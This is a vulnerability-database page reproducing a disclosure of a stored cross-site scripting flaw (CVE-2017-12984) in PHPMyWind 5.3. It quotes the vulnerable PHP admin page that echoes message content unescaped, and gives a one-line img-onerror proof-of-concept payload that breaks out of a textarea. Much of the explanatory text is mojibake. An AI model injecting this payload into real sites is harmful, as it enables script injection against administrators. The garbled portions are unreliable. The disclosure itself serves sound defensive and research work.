Vulners
Lucene search
PHPMyWind 5.3 Cross Site Scripting
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | PHPMyWind 5.3 - Cross-Site Scripting Vulnerability | 21 Aug 201700:00 | – | zdt |
 | PHPMyWind shoppingcart.php file cross-site scripting vulnerability | 22 Aug 201700:00 | – | cnvd |
 | CVE-2017-12984 | 21 Aug 201707:00 | – | cve |
 | CVE-2017-12984 | 21 Aug 201707:00 | – | cvelist |
 | PHPMyWind 5.3 - Cross-Site Scripting | 21 Aug 201700:00 | – | exploitdb |
 | EUVD-2017-4502 | 7 Oct 202500:30 | – | euvd |
 | PHPMyWind 5.3 - Cross-Site Scripting | 21 Aug 201700:00 | – | exploitpack |
 | CVE-2017-12984 | 21 Aug 201707:29 | – | nvd |
 | CVE-2017-12984 | 21 Aug 201707:29 | – | osv |
 | Design/Logic Flaw | 21 Aug 201707:29 | – | prion |
10
`Exploit Titlei1/4PHPMyWind 5.3 has XSS
Exploit Author:adege"
Vendor Homepage:http://phpmywind.com
Software Link:http://phpmywind.com/downloads/PHPMyWind_5.3.zip
Version:5.3
CVE:CVE-2017-12984
$r= $dosql->GetOne("SELECT Max(orderid) AS orderid FROM `#@__message`");
$orderid= (empty($r['orderid']) ? 1 : ($r['orderid'] + 1));
$nickname= htmlspecialchars($nickname);//ae,,a(r)C/(xxx)
$contact= htmlspecialchars($contact); //ec3>>ae1a1/4
$content= htmlspecialchars($content); //ce"aa(r)1
$posttime= GetMkTime(time());
$ip= gethostbyname($_SERVER['REMOTE_ADDR']);
$sql= "INSERT INTO `#@__message` (siteid, nickname, contact, content, orderid, posttime, htop, rtop, checkinfo, ip) VALUES (1, '$nickname', '$contact', '$content', '$orderid', '$posttime', '', '', 'false', '$ip')";
if($dosql->ExecNoneQuery($sql))
{
ShowMsg('ce"aeai1/4aeedegC/ae"cae-aei1/4','message.php');
exit();
}
}
a-a>>Y=caoa1/2?c"htmlspecialcharse?e!e?ae>>$?,a,|aY=aoa,.
e*e?contentaaedega
127.0.0.1/PHPMyWind_5.3/admin/ message_update.php
<?php require_once(dirname(__FILE__).'/inc/config.inc.php');IsModelPriv('message'); ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>a?(r)ae1ce"</title>
<link href="templates/style/admin.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="templates/js/jquery.min.js"></script>
<script type="text/javascript" src="templates/js/checkf.func.js"></script>
<script type="text/javascript" src="editor/kindeditor-min.js"></script>
<script type="text/javascript" src="editor/lang/zh_CN.js"></script>
</head>
<body>
<?php
$row = $dosql->GetOne("SELECT * FROM `#@__message` WHERE `id`=$id");
?>
<div class="formHeader"> <span class="title">a?(r)ae1ce"</span> <a href="javascript:location.reload();" class="reload">a*aedeg</a> </div>
<form name="form" id="form" method="post" action="message_save.php">
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="formTable">
<tr>
<td width="25%" height="40" align="right">c"ae*ai1/4</td>
<td width="75%"><strong><?php echo $row['nickname'] ?></strong></td>
</tr>
<tr>
<td height="40" align="right">ec3>>ae1a1/4i1/4</td>
<td><input type="text" name="contact" id="contact" class="input" value="<?php echo $row['contact'] ?>" /></td>
</tr>
<tr>
<td height="198" align="right">ce"aa(r)1i1/4</td>
<td><textarea name="content" id="content"><?php echo $row['content'] ?></textarea>
<script>
p:33
<td><textarea name="content" id="content"><?php echo $row['content'] ?></textarea>
aadegc'aeY=aaocontentaaedeg,aedegae(r)a1Paeae?e!e1/2!a1aea1/2a
EXP: a><img/src=x onerror=alert(2001)><aa
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Aug 2017 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.01431